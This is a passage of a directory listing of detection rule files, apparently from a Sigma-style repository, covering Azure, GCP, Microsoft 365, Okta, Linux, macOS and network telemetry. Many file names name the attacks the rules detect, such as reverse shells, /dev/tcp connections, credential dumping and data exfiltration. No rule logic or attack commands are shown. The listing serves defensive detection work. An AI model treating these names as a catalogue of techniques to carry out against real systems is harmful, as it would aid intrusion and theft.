│ │ │ │ ├── azure_aad_secops_ca_policy_removedby_bad_actor.yml
│ │ │ │ ├── azure_aad_secops_ca_policy_updatedby_bad_actor.yml
│ │ │ │ ├── azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
│ │ │ │ ├── azure_ad_account_created_deleted.yml
│ │ │ │ ├── azure_ad_bitlocker_key_retrieval.yml
│ │ │ │ ├── azure_ad_certificate_based_authencation_enabled.yml
│ │ │ │ ├── azure_ad_device_registration_policy_changes.yml
│ │ │ │ ├── azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
│ │ │ │ ├── azure_ad_new_root_ca_added.yml
│ │ │ │ ├── azure_ad_users_added_to_device_admin_roles.yml
│ │ │ │ ├── azure_app_appid_uri_changes.yml
│ │ │ │ ├── azure_app_credential_added.yml
│ │ │ │ ├── azure_app_delegated_permissions_all_users.yml
│ │ │ │ ├── azure_app_end_user_consent.yml
│ │ │ │ ├── azure_app_end_user_consent_blocked.yml
│ │ │ │ ├── azure_app_owner_added.yml
│ │ │ │ ├── azure_app_permissions_msft.yml
│ │ │ │ ├── azure_app_privileged_permissions.yml
│ │ │ │ ├── azure_app_role_added.yml
│ │ │ │ ├── azure_app_uri_modifications.yml
│ │ │ │ ├── azure_auditlogs_laps_credential_dumping.yml
│ │ │ │ ├── azure_change_to_authentication_method.yml
│ │ │ │ ├── azure_federation_modified.yml
│ │ │ │ ├── azure_group_user_addition_ca_modification.yml
│ │ │ │ ├── azure_group_user_removal_ca_modification.yml
│ │ │ │ ├── azure_guest_invite_failure.yml
│ │ │ │ ├── azure_guest_to_member.yml
│ │ │ │ ├── azure_pim_activation_approve_deny.yml
│ │ │ │ ├── azure_pim_alerts_disabled.yml
│ │ │ │ ├── azure_pim_change_settings.yml
│ │ │ │ ├── azure_priviledged_role_assignment_add.yml
│ │ │ │ ├── azure_priviledged_role_assignment_bulk_change.yml
│ │ │ │ ├── azure_privileged_account_creation.yml
│ │ │ │ ├── azure_subscription_permissions_elevation_via_auditlogs.yml
│ │ │ │ ├── azure_tap_added.yml
│ │ │ │ ├── azure_update_risk_and_mfa_registration_policy.yml
│ │ │ │ ├── azure_user_account_mfa_disable.yml
│ │ │ │ └── azure_user_password_change.yml
│ │ │ ├── identity_protection/
│ │ │ │ ├── azure_identity_protection_anomalous_token.yml
│ │ │ │ ├── azure_identity_protection_anomalous_user.yml
│ │ │ │ ├── azure_identity_protection_anonymous_ip_activity.yml
│ │ │ │ ├── azure_identity_protection_anonymous_ip_address.yml
│ │ │ │ ├── azure_identity_protection_atypical_travel.yml
│ │ │ │ ├── azure_identity_protection_impossible_travel.yml
│ │ │ │ ├── azure_identity_protection_inbox_forwarding_rule.yml
│ │ │ │ ├── azure_identity_protection_inbox_manipulation.yml
│ │ │ │ ├── azure_identity_protection_leaked_credentials.yml
│ │ │ │ ├── azure_identity_protection_malicious_ip_address.yml
│ │ │ │ ├── azure_identity_protection_malicious_ip_address_suspicious.yml
│ │ │ │ ├── azure_identity_protection_malware_linked_ip.yml
│ │ │ │ ├── azure_identity_protection_new_coutry_region.yml
│ │ │ │ ├── azure_identity_protection_password_spray.yml
│ │ │ │ ├── azure_identity_protection_prt_access.yml
│ │ │ │ ├── azure_identity_protection_suspicious_browser.yml
│ │ │ │ ├── azure_identity_protection_threat_intel.yml
│ │ │ │ ├── azure_identity_protection_token_issuer_anomaly.yml
│ │ │ │ └── azure_identity_protection_unfamilar_sign_in.yml
│ │ │ ├── privileged_identity_management/
│ │ │ │ ├── azure_pim_account_stale.yml
│ │ │ │ ├── azure_pim_invalid_license.yml
│ │ │ │ ├── azure_pim_role_assigned_outside_of_pim.yml
│ │ │ │ ├── azure_pim_role_frequent_activation.yml
│ │ │ │ ├── azure_pim_role_no_mfa_required.yml
│ │ │ │ ├── azure_pim_role_not_used.yml
│ │ │ │ └── azure_pim_too_many_global_admins.yml
│ │ │ └── signin_logs/
│ │ │ ├── azure_account_lockout.yml
│ │ │ ├── azure_ad_auth_failure_increase.yml
│ │ │ ├── azure_ad_auth_sucess_increase.yml
│ │ │ ├── azure_ad_auth_to_important_apps_using_single_factor_auth.yml
│ │ │ ├── azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
│ │ │ ├── azure_ad_azurehound_discovery.yml
│ │ │ ├── azure_ad_device_registration_or_join_without_mfa.yml
│ │ │ ├── azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
│ │ │ ├── azure_ad_only_single_factor_auth_required.yml
│ │ │ ├── azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
│ │ │ ├── azure_ad_sign_ins_from_noncompliant_devices.yml
│ │ │ ├── azure_ad_sign_ins_from_unknown_devices.yml
│ │ │ ├── azure_ad_suspicious_signin_bypassing_mfa.yml
│ │ │ ├── azure_app_device_code_authentication.yml
│ │ │ ├── azure_app_ropc_authentication.yml
│ │ │ ├── azure_blocked_account_attempt.yml
│ │ │ ├── azure_conditional_access_failure.yml
│ │ │ ├── azure_legacy_authentication_protocols.yml
│ │ │ ├── azure_login_to_disabled_account.yml
│ │ │ ├── azure_mfa_denies.yml
│ │ │ ├── azure_mfa_interrupted.yml
│ │ │ ├── azure_unusual_authentication_interruption.yml
│ │ │ ├── azure_user_login_blocked_by_conditional_access.yml
│ │ │ └── azure_users_authenticating_to_other_azure_ad_tenants.yml
│ │ ├── gcp/
│ │ │ ├── audit/
│ │ │ │ ├── gcp_access_policy_deleted.yml
│ │ │ │ ├── gcp_breakglass_container_workload_deployed.yml
│ │ │ │ ├── gcp_bucket_enumeration.yml
│ │ │ │ ├── gcp_bucket_modified_or_deleted.yml
│ │ │ │ ├── gcp_dlp_re_identifies_sensitive_information.yml
│ │ │ │ ├── gcp_dns_zone_modified_or_deleted.yml
│ │ │ │ ├── gcp_firewall_rule_modified_or_deleted.yml
│ │ │ │ ├── gcp_full_network_traffic_packet_capture.yml
│ │ │ │ ├── gcp_kubernetes_admission_controller.yml
│ │ │ │ ├── gcp_kubernetes_cronjob.yml
│ │ │ │ ├── gcp_kubernetes_rolebinding.yml
│ │ │ │ ├── gcp_kubernetes_secrets_modified_or_deleted.yml
│ │ │ │ ├── gcp_service_account_disabled_or_deleted.yml
│ │ │ │ ├── gcp_service_account_modified.yml
│ │ │ │ ├── gcp_sql_database_modified_or_deleted.yml
│ │ │ │ └── gcp_vpn_tunnel_modified_or_deleted.yml
│ │ │ └── gworkspace/
│ │ │ ├── gcp_gworkspace_application_access_levels_modified.yml
│ │ │ ├── gcp_gworkspace_application_removed.yml
│ │ │ ├── gcp_gworkspace_granted_domain_api_access.yml
│ │ │ ├── gcp_gworkspace_mfa_disabled.yml
│ │ │ ├── gcp_gworkspace_role_modified_or_deleted.yml
│ │ │ ├── gcp_gworkspace_role_privilege_deleted.yml
│ │ │ └── gcp_gworkspace_user_granted_admin_privileges.yml
│ │ └── m365/
│ │ ├── audit/
│ │ │ ├── microsoft365_bypass_conditional_access.yml
│ │ │ ├── microsoft365_disabling_mfa.yml
│ │ │ └── microsoft365_new_federated_domain_added_audit.yml
│ │ ├── exchange/
│ │ │ └── microsoft365_new_federated_domain_added_exchange.yml
│ │ ├── threat_detection/
│ │ │ └── microsoft365_from_susp_ip_addresses.yml
│ │ └── threat_management/
│ │ ├── microsoft365_activity_by_terminated_user.yml
│ │ ├── microsoft365_activity_from_anonymous_ip_addresses.yml
│ │ ├── microsoft365_activity_from_infrequent_country.yml
│ │ ├── microsoft365_data_exfiltration_to_unsanctioned_app.yml
│ │ ├── microsoft365_impossible_travel_activity.yml
│ │ ├── microsoft365_logon_from_risky_ip_address.yml
│ │ ├── microsoft365_potential_ransomware_activity.yml
│ │ ├── microsoft365_pst_export_alert.yml
│ │ ├── microsoft365_pst_export_alert_using_new_compliancesearchaction.yml
│ │ ├── microsoft365_susp_inbox_forwarding.yml
│ │ ├── microsoft365_susp_oauth_app_file_download_activities.yml
│ │ ├── microsoft365_unusual_volume_of_file_deletion.yml
│ │ └── microsoft365_user_restricted_from_sending_email.yml
│ ├── identity/
│ │ ├── cisco_duo/
│ │ │ └── cisco_duo_mfa_bypass_via_bypass_code.yml
│ │ ├── okta/
│ │ │ ├── okta_admin_activity_from_proxy_query.yml
│ │ │ ├── okta_admin_role_assigned_to_user_or_group.yml
│ │ │ ├── okta_admin_role_assignment_created.yml
│ │ │ ├── okta_api_token_created.yml
│ │ │ ├── okta_api_token_revoked.yml
│ │ │ ├── okta_application_modified_or_deleted.yml
│ │ │ ├── okta_application_sign_on_policy_modified_or_deleted.yml
│ │ │ ├── okta_fastpass_phishing_detection.yml
│ │ │ ├── okta_identity_provider_created.yml
│ │ │ ├── okta_mfa_reset_or_deactivated.yml
│ │ │ ├── okta_network_zone_deactivated_or_deleted.yml
│ │ │ ├── okta_new_behaviours_admin_console.yml
│ │ │ ├── okta_password_in_alternateid_field.yml
│ │ │ ├── okta_policy_modified_or_deleted.yml
│ │ │ ├── okta_policy_rule_modified_or_deleted.yml
│ │ │ ├── okta_security_threat_detected.yml
│ │ │ ├── okta_suspicious_activity_enduser_report.yml
│ │ │ ├── okta_unauthorized_access_to_app.yml
│ │ │ ├── okta_user_account_locked_out.yml
│ │ │ ├── okta_user_created.yml
│ │ │ └── okta_user_session_start_via_anonymised_proxy.yml
│ │ └── onelogin/
│ │ ├── onelogin_assumed_another_user.yml
│ │ └── onelogin_user_account_locked.yml
│ ├── linux/
│ │ ├── auditd/
│ │ │ ├── execve/
│ │ │ │ ├── lnx_auditd_binary_padding.yml
│ │ │ │ ├── lnx_auditd_bpfdoor_port_redirect.yml
│ │ │ │ ├── lnx_auditd_capabilities_discovery.yml
│ │ │ │ ├── lnx_auditd_change_file_time_attr.yml
│ │ │ │ ├── lnx_auditd_chattr_immutable_removal.yml
│ │ │ │ ├── lnx_auditd_clipboard_collection.yml
│ │ │ │ ├── lnx_auditd_clipboard_image_collection.yml
│ │ │ │ ├── lnx_auditd_coinminer.yml
│ │ │ │ ├── lnx_auditd_data_compressed.yml
│ │ │ │ ├── lnx_auditd_data_exfil_wget.yml
│ │ │ │ ├── lnx_auditd_dd_delete_file.yml
│ │ │ │ ├── lnx_auditd_file_or_folder_permissions.yml
│ │ │ │ ├── lnx_auditd_find_cred_in_files.yml
│ │ │ │ ├── lnx_auditd_hidden_files_directories.yml
│ │ │ │ ├── lnx_auditd_hidden_zip_files_steganography.yml
│ │ │ │ ├── lnx_auditd_masquerading_crond.yml
│ │ │ │ ├── lnx_auditd_modify_system_firewall.yml
│ │ │ │ ├── lnx_auditd_network_sniffing.yml
│ │ │ │ ├── lnx_auditd_screencapture_import.yml
│ │ │ │ ├── lnx_auditd_screencaputre_xwd.yml
│ │ │ │ ├── lnx_auditd_steghide_embed_steganography.yml
│ │ │ │ ├── lnx_auditd_steghide_extract_steganography.yml
│ │ │ │ ├── lnx_auditd_susp_cmds.yml
│ │ │ │ ├── lnx_auditd_susp_histfile_operations.yml
│ │ │ │ ├── lnx_auditd_susp_service_reload_or_restart.yml
│ │ │ │ ├── lnx_auditd_system_shutdown_reboot.yml
│ │ │ │ ├── lnx_auditd_unzip_hidden_zip_files_steganography.yml
│ │ │ │ └── lnx_auditd_user_discovery.yml
│ │ │ ├── lnx_auditd_audio_capture.yml
│ │ │ ├── lnx_auditd_disable_aslr_protection.yml
│ │ │ ├── lnx_auditd_keylogging_with_pam_d.yml
│ │ │ ├── lnx_auditd_password_policy_discovery.yml
│ │ │ ├── lnx_auditd_susp_c2_commands.yml
│ │ │ ├── lnx_auditd_system_info_discovery.yml
│ │ │ ├── path/
│ │ │ │ ├── lnx_auditd_auditing_config_change.yml
│ │ │ │ ├── lnx_auditd_bpfdoor_file_accessed.yml
│ │ │ │ ├── lnx_auditd_hidden_binary_execution.yml
│ │ │ │ ├── lnx_auditd_ld_so_preload_mod.yml
│ │ │ │ ├── lnx_auditd_logging_config_change.yml
│ │ │ │ ├── lnx_auditd_magic_system_request_key.yml
│ │ │ │ ├── lnx_auditd_system_info_discovery2.yml
│ │ │ │ ├── lnx_auditd_systemd_service_creation.yml
│ │ │ │ └── lnx_auditd_unix_shell_configuration_modification.yml
│ │ │ ├── service_stop/
│ │ │ │ └── lnx_auditd_disable_system_firewall.yml
│ │ │ └── syscall/
│ │ │ ├── lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml
│ │ │ ├── lnx_auditd_create_account.yml
│ │ │ ├── lnx_auditd_load_module_insmod.yml
│ │ │ ├── lnx_auditd_network_service_scanning.yml
│ │ │ ├── lnx_auditd_split_file_into_pieces.yml
│ │ │ ├── lnx_auditd_susp_discovery_sysinfo_syscall.yml
│ │ │ ├── lnx_auditd_susp_exe_folders.yml
│ │ │ ├── lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml
│ │ │ └── lnx_auditd_web_rce.yml
│ │ ├── builtin/
│ │ │ ├── clamav/
│ │ │ │ └── lnx_clamav_relevant_message.yml
│ │ │ ├── cron/
│ │ │ │ └── lnx_cron_crontab_file_modification.yml
│ │ │ ├── guacamole/
│ │ │ │ └── lnx_guacamole_susp_guacamole.yml
│ │ │ ├── lnx_apt_equationgroup_lnx.yml
│ │ │ ├── lnx_buffer_overflows.yml
│ │ │ ├── lnx_clear_syslog.yml
│ │ │ ├── lnx_file_copy.yml
│ │ │ ├── lnx_ldso_preload_injection.yml
│ │ │ ├── lnx_potential_susp_ebpf_activity.yml
│ │ │ ├── lnx_privileged_user_creation.yml
│ │ │ ├── lnx_shell_clear_cmd_history.yml
│ │ │ ├── lnx_shell_susp_commands.yml
│ │ │ ├── lnx_shell_susp_log_entries.yml
│ │ │ ├── lnx_shell_susp_rev_shells.yml
│ │ │ ├── lnx_shellshock.yml
│ │ │ ├── lnx_susp_dev_tcp.yml
│ │ │ ├── lnx_susp_jexboss.yml
│ │ │ ├── lnx_symlink_etc_passwd.yml
│ │ │ ├── sshd/
│ │ │ │ └── lnx_sshd_susp_ssh.yml
│ │ │ ├── syslog/
│ │ │ │ ├── lnx_syslog_security_tools_disabling_syslog.yml
│ │ │ │ └── lnx_syslog_susp_named.yml
│ │ │ └── vsftpd/
│ │ │ └── lnx_vsftpd_susp_error_messages.yml
│ │ ├── file_event/
│ │ │ ├── file_event_lnx_doas_conf_creation.yml
│ │ │ ├── file_event_lnx_persistence_cron_files.yml
│ │ │ ├── file_event_lnx_persistence_sudoers_files.yml
│ │ │ ├── file_event_lnx_susp_filename_with_embedded_base64_command.yml
│ │ │ ├── file_event_lnx_susp_shell_script_under_profile_directory.yml
│ │ │ ├── file_event_lnx_triple_cross_rootkit_lock_file.yml
│ │ │ ├── file_event_lnx_triple_cross_rootkit_persistence.yml
│ │ │ └── file_event_lnx_wget_download_file_in_tmp_dir.yml
│ │ ├── network_connection/
│ │ │ ├── net_connection_lnx_back_connect_shell_dev.yml
│ │ │ ├── net_connection_lnx_crypto_mining_indicators.yml
│ │ │ ├── net_connection_lnx_domain_localtonet_tunnel.yml
│ │ │ ├── net_connection_lnx_ngrok_tunnel.yml
│ │ │ └── net_connection_lnx_susp_malware_callback_port.yml
│ │ └── process_creation/
│ │ ├── proc_creation_lnx_apt_shell_execution.yml
│ │ ├── proc_creation_lnx_at_command.yml
│ │ ├── proc_creation_lnx_auditctl_clear_rules.yml
│ │ ├── proc_creation_lnx_av_kaspersky_av_disabled.yml
│ │ ├── proc_creation_lnx_awk_shell_spawn.yml
│ │ ├── proc_creation_lnx_base64_decode.yml
│ │ ├── proc_creation_lnx_base64_execution.yml
│ │ ├── proc_creation_lnx_base64_shebang_cli.yml
│ │ ├── proc_creation_lnx_bash_interactive_shell.yml
│ │ ├── proc_creation_lnx_bpf_kprob_tracing_enabled.yml
│ │ ├── proc_creation_lnx_bpftrace_unsafe_option_usage.yml
│ │ ├── proc_creation_lnx_cap_setgid.yml
│ │ ├── proc_creation_lnx_cap_setuid.yml
│ │ ├── proc_creation_lnx_capa_discovery.yml
│ │ ├── proc_creation_lnx_capsh_shell_invocation.yml
│ │ ├── proc_creation_lnx_chattr_immutable_removal.yml
│ │ ├── proc_creation_lnx_chroot_execution.yml
│ │ ├── proc_creation_lnx_clear_logs.yml
│ │ ├── proc_creation_lnx_clear_syslog.yml
│ │ ├── proc_creation_lnx_clipboard_collection.yml
│ │ ├── proc_creation_lnx_cp_passwd_or_shadow_tmp.yml
│ │ ├── proc_creation_lnx_crontab_enumeration.yml
│ │ ├── proc_creation_lnx_crontab_removal.yml
│ │ ├── proc_creation_lnx_crypto_mining.yml
│ │ ├── proc_creation_lnx_curl_usage.yml
│ │ ├── proc_creation_lnx_curl_wget_exec_tmp.yml
│ │ ├── proc_creation_lnx_dd_file_overwrite.yml
│ │ ├── proc_creation_lnx_dd_process_injection.yml
│ │ ├── proc_creation_lnx_disable_ufw.yml
│ │ ├── proc_creation_lnx_doas_execution.yml
│ │ ├── proc_creation_lnx_env_shell_invocation.yml
│ │ ├── proc_creation_lnx_esxcli_network_discovery.yml
│ │ ├── proc_creation_lnx_esxcli_permission_change_admin.yml
│ │ ├── proc_creation_lnx_esxcli_storage_discovery.yml
│ │ ├── proc_creation_lnx_esxcli_syslog_config_change.yml
│ │ ├── proc_creation_lnx_esxcli_system_discovery.yml
│ │ ├── proc_creation_lnx_esxcli_user_account_creation.yml
│ │ ├── proc_creation_lnx_esxcli_vm_discovery.yml
│ │ ├── proc_creation_lnx_esxcli_vm_kill.yml
│ │ ├── proc_creation_lnx_esxcli_vsan_discovery.yml
│ │ ├── proc_creation_lnx_file_and_directory_discovery.yml
│ │ ├── proc_creation_lnx_file_deletion.yml
│ │ ├── proc_creation_lnx_find_shell_execution.yml
│ │ ├── proc_creation_lnx_flock_shell_execution.yml
│ │ ├── proc_creation_lnx_gcc_shell_execution.yml
│ │ ├── proc_creation_lnx_git_shell_execution.yml
│ │ ├── proc_creation_lnx_grep_os_arch_discovery.yml
│ │ ├── proc_creation_lnx_groupdel.yml
│ │ ├── proc_creation_lnx_install_root_certificate.yml
│ │ ├── proc_creation_lnx_install_suspicious_packages.yml
│ │ ├── proc_creation_lnx_iptables_flush_ufw.yml
│ │ ├── proc_creation_lnx_local_account.yml
│ │ ├── proc_creation_lnx_local_groups.yml
│ │ ├── proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
│ │ ├── proc_creation_lnx_mkfifo_named_pipe_creation.yml
│ │ ├── proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
│ │ ├── proc_creation_lnx_mount_hidepid.yml
│ │ ├── proc_creation_lnx_netcat_reverse_shell.yml
│ │ ├── proc_creation_lnx_nice_shell_execution.yml
│ │ ├── proc_creation_lnx_nohup.yml
│ │ ├── proc_creation_lnx_nohup_susp_execution.yml
│ │ ├── proc_creation_lnx_omigod_scx_runasprovider_executescript.yml
│ │ ├── proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml
│ │ ├── proc_creation_lnx_perl_reverse_shell.yml
│ │ ├── proc_creation_lnx_php_reverse_shell.yml
│ │ ├── proc_creation_lnx_pnscan_binary_cli_pattern.yml
│ │ ├── proc_creation_lnx_proxy_connection.yml
│ │ ├── proc_creation_lnx_pua_trufflehog.yml
│ │ ├── proc_creation_lnx_python_http_server_execution.yml
│ │ ├── proc_creation_lnx_python_pty_spawn.yml
│ │ ├── proc_creation_lnx_python_reverse_shell.yml
│ │ ├── proc_creation_lnx_python_shell_os_system.yml
│ │ ├── proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml
│ │ ├── proc_creation_lnx_remote_system_discovery.yml
│ │ ├── proc_creation_lnx_remove_package.yml
│ │ ├── proc_creation_lnx_rsync_shell_execution.yml
│ │ ├── proc_creation_lnx_rsync_shell_spawn.yml
│ │ ├── proc_creation_lnx_ruby_reverse_shell.yml
│ │ ├── proc_creation_lnx_schedule_task_job_cron.yml
│ │ ├── proc_creation_lnx_security_software_discovery.yml
│ │ ├── proc_creation_lnx_security_tools_disabling.yml
│ │ ├── proc_creation_lnx_services_stop_and_disable.yml
│ │ ├── proc_creation_lnx_setgid_setuid.yml
│ │ ├── proc_creation_lnx_ssh_shell_execution.yml
│ │ ├── proc_creation_lnx_ssm_agent_abuse.yml
│ │ ├── proc_creation_lnx_susp_chmod_directories.yml
│ │ ├── proc_creation_lnx_susp_container_residence_discovery.yml
│ │ ├── proc_creation_lnx_susp_curl_fileupload.yml
│ │ ├── proc_creation_lnx_susp_curl_useragent.yml
│ │ ├── proc_creation_lnx_susp_dockerenv_recon.yml
│ │ ├── proc_creation_lnx_susp_execution_tmp_folder.yml
│ │ ├── proc_creation_lnx_susp_find_execution.yml
│ │ ├── proc_creation_lnx_susp_git_clone.yml
│ │ ├── proc_creation_lnx_susp_history_delete.yml
│ │ ├── proc_creation_lnx_susp_history_recon.yml
│ │ ├── proc_creation_lnx_susp_hktl_execution.yml
│ │ ├── proc_creation_lnx_susp_inod_listing.yml
│ │ ├── proc_creation_lnx_susp_interactive_bash.yml
│ │ ├── proc_creation_lnx_susp_java_children.yml
│ │ ├── proc_creation_lnx_susp_network_utilities_execution.yml
│ │ ├── proc_creation_lnx_susp_pipe_shell.yml
│ │ ├── proc_creation_lnx_susp_process_reading_sudoers.yml
│ │ ├── proc_creation_lnx_susp_recon_indicators.yml
│ │ ├── proc_creation_lnx_susp_sensitive_file_access.yml
│ │ ├── proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
│ │ ├── proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
│ │ ├── proc_creation_lnx_system_info_discovery.yml
│ │ ├── proc_creation_lnx_system_network_connections_discovery.yml
│ │ ├── proc_creation_lnx_system_network_discovery.yml
│ │ ├── proc_creation_lnx_systemctl_mask_power_settings.yml
│ │ ├── proc_creation_lnx_touch_susp.yml
│ │ ├── proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
│ │ ├── proc_creation_lnx_triple_cross_rootkit_install.yml
│ │ ├── proc_creation_lnx_userdel.yml
│ │ ├── proc_creation_lnx_usermod_susp_group.yml
│ │ ├── proc_creation_lnx_vim_shell_execution.yml
│ │ ├── proc_creation_lnx_webshell_detection.yml
│ │ ├── proc_creation_lnx_wget_download_suspicious_directory.yml
│ │ └── proc_creation_lnx_xterm_reverse_shell.yml
│ ├── macos/
│ │ ├── file_event/
│ │ │ ├── file_event_macos_emond_launch_daemon.yml
│ │ │ └── file_event_macos_susp_startup_item_created.yml
│ │ └── process_creation/
│ │ ├── proc_creation_macos_applescript.yml
│ │ ├── proc_creation_macos_base64_decode.yml
│ │ ├── proc_creation_macos_binary_padding.yml
│ │ ├── proc_creation_macos_change_file_time_attr.yml
│ │ ├── proc_creation_macos_chflags_hidden_flag.yml
│ │ ├── proc_creation_macos_clear_system_logs.yml
│ │ ├── proc_creation_macos_clipboard_data_via_osascript.yml
│ │ ├── proc_creation_macos_create_account.yml
│ │ ├── proc_creation_macos_create_hidden_account.yml
│ │ ├── proc_creation_macos_creds_from_keychain.yml
│ │ ├── proc_creation_macos_csrutil_disable.yml
│ │ ├── proc_creation_macos_csrutil_status.yml
│ │ ├── proc_creation_macos_disable_security_tools.yml
│ │ ├── proc_creation_macos_dscl_add_user_to_admin_group.yml
│ │ ├── proc_creation_macos_dseditgroup_add_to_admin_group.yml
│ │ ├── proc_creation_macos_dsenableroot_enable_root_account.yml
│ │ ├── proc_creation_macos_file_and_directory_discovery.yml
│ │ ├── proc_creation_macos_find_cred_in_files.yml
│ │ ├── proc_creation_macos_gui_input_capture.yml
│ │ ├── proc_creation_macos_hdiutil_create.yml
│ │ ├── proc_creation_macos_hdiutil_mount.yml
│ │ ├── proc_creation_macos_installer_susp_child_process.yml
│ │ ├── proc_creation_macos_ioreg_discovery.yml
│ │ ├── proc_creation_macos_jamf_susp_child.yml
│ │ ├── proc_creation_macos_jamf_usage.yml
│ │ ├── proc_creation_macos_jxa_in_memory_execution.yml
│ │ ├── proc_creation_macos_launchctl_execution.yml
│ │ ├── proc_creation_macos_local_account.yml
│ │ ├── proc_creation_macos_local_groups.yml
│ │ ├── proc_creation_macos_network_service_scanning.yml
│ │ ├── proc_creation_macos_network_sniffing.yml
│ │ ├── proc_creation_macos_nscurl_usage.yml
│ │ ├── proc_creation_macos_office_susp_child_processes.yml
│ │ ├── proc_creation_macos_osacompile_runonly_execution.yml
│ │ ├── proc_creation_macos_payload_decoded_and_decrypted.yml
│ │ ├── proc_creation_macos_persistence_via_plistbuddy.yml
│ │ ├── proc_creation_macos_remote_access_tools_meshagent_arguments.yml
│ │ ├── proc_creation_macos_remote_access_tools_renamed_meshagent_execution.yml
│ │ ├── proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml
│ │ ├── proc_creation_macos_remote_system_discovery.yml
│ │ ├── proc_creation_macos_schedule_task_job_cron.yml
│ │ ├── proc_creation_macos_screencapture.yml
│ │ ├── proc_creation_macos_security_software_discovery.yml
│ │ ├── proc_creation_macos_space_after_filename.yml
│ │ ├── proc_creation_macos_split_file_into_pieces.yml
│ │ ├── proc_creation_macos_susp_browser_child_process.yml
│ │ ├── proc_creation_macos_susp_execution_macos_script_editor.yml
│ │ ├── proc_creation_macos_susp_find_execution.yml
│ │ ├── proc_creation_macos_susp_histfile_operations.yml
│ │ ├── proc_creation_macos_susp_in_memory_download_and_compile.yml
│ │ ├── proc_creation_macos_susp_macos_firmware_activity.yml
│ │ ├── proc_creation_macos_susp_system_network_discovery.yml
│ │ ├── proc_creation_macos_suspicious_applet_behaviour.yml
│ │ ├── proc_creation_macos_swvers_discovery.yml
│ │ ├── proc_creation_macos_sysadminctl_add_user_to_admin_group.yml
│ │ ├── proc_creation_macos_sysadminctl_enable_guest_account.yml
│ │ ├── proc_creation_macos_sysctl_discovery.yml
│ │ ├── proc_creation_macos_system_network_connections_discovery.yml
│ │ ├── proc_creation_macos_system_profiler_discovery.yml
│ │ ├── proc_creation_macos_system_shutdown_reboot.yml
│ │ ├── proc_creation_macos_tail_base64_decode_from_image.yml
│ │ ├── proc_creation_macos_tmutil_delete_backup.yml
│ │ ├── proc_creation_macos_tmutil_disable_backup.yml
│ │ ├── proc_creation_macos_tmutil_exclude_file_from_backup.yml
│ │ ├── proc_creation_macos_wizardupdate_malware_infection.yml
│ │ ├── proc_creation_macos_xattr_gatekeeper_bypass.yml
│ │ └── proc_creation_macos_xcsset_malware_infection.yml
│ ├── network/
│ │ ├── cisco/
│ │ │ ├── aaa/
│ │ │ │ ├── cisco_cli_clear_logs.yml
│ │ │ │ ├── cisco_cli_collect_data.yml
│ │ │ │ ├── cisco_cli_crypto_actions.yml
│ │ │ │ ├── cisco_cli_disable_logging.yml
│ │ │ │ ├── cisco_cli_discovery.yml
│ │ │ │ ├── cisco_cli_dos.yml
│ │ │ │ ├── cisco_cli_file_deletion.yml
│ │ │ │ ├── cisco_cli_input_capture.yml
│ │ │ │ ├── cisco_cli_local_accounts.yml
│ │ │ │ ├── cisco_cli_modify_config.yml
│ │ │ │ ├── cisco_cli_moving_data.yml
│ │ │ │ └── cisco_cli_net_sniff.yml
│ │ │ ├── bgp/
│ │ │ │ └── cisco_bgp_md5_auth_failed.yml
│ │ │ └── ldp/
│ │ │ └── cisco_ldp_md5_auth_failed.yml
│ │ ├── dns/
│ │ │ ├── net_dns_external_service_interaction_domains.yml
│ │ │ ├── net_dns_mal_cobaltstrike.yml
│ │ │ ├── net_dns_pua_cryptocoin_mining_xmr.yml
│ │ │ ├── net_dns_susp_b64_queries.yml
│ │ │ ├── net_dns_susp_telegram_api.yml
│ │ │ ├── net_dns_susp_txt_exec_strings.yml
│ │ │ └── net_dns_wannacry_killswitch_domain.yml
│ │ ├── firewall/
│ │ │ └── net_firewall_cleartext_protocols.yml
│ │ ├── fortinet/
│ │ │ └── fortigate/
│ │ │ ├── fortinet_fortigate_new_admin_account_created.yml
│ │ │ ├── fortinet_fortigate_new_firewall_address_object.yml
│ │ │ ├── fortinet_fortigate_new_firewall_policy_added.yml
│ │ │ ├── fortinet_fortigate_new_local_user_created.yml
│ │ │ ├── fortinet_fortigate_new_vpn_ssl_web_portal.yml
│ │ │ ├── fortinet_fortigate_user_group_modified.yml
│ │ │ └── fortinet_fortigate_vpn_ssl_settings_modified.yml
│ │ ├── huawei/
│ │ │ └── bgp/
│ │ │ └── huawei_bgp_auth_failed.yml
│ │ ├── juniper/
│ │ │ └── bgp/
│ │ │ └── juniper_bgp_missing_md5.yml
│ │ └── zeek/
│ │ ├── zeek_dce_rpc_mitre_bzar_execution.yml
│ │ ├── zeek_dce_rpc_mitre_bzar_persistence.yml
│ │ ├── zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
│ │ ├── zeek_dce_rpc_smb_spoolss_named_pipe.yml
│ │ ├── zeek_default_cobalt_strike_certificate.yml
│ │ ├── zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml
│ │ ├── zeek_dns_mining_pools.yml
│ │ ├── zeek_dns_nkn.yml
│ │ ├── zeek_dns_susp_zbit_flag.yml
│ │ ├── zeek_dns_torproxy.yml
│ │ ├── zeek_http_executable_download_from_webdav.yml
│ │ ├── zeek_http_susp_file_ext_from_susp_tld.yml
│ │ ├── zeek_http_webdav_put_request.yml
│ │ ├── zeek_rdp_public_listener.yml
│ │ ├── zeek_smb_converted_win_atsvc_task.yml
│ │ ├── zeek_smb_converted_win_impacket_secretdump.yml
│ │ ├── zeek_smb_converted_win_lm_namedpipe.yml
│ │ ├── zeek_smb_converted_win_susp_psexec.yml
│ │ ├── zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
│ │ ├── zeek_smb_converted_win_transferring_files_with_credential_data.yml
│ │ └── zeek_susp_kerberos_rc4.yml
│ ├── web/
│ │ ├── product/
│ │ │ ├── apache/
│ │ │ │ ├── web_apache_segfault.yml
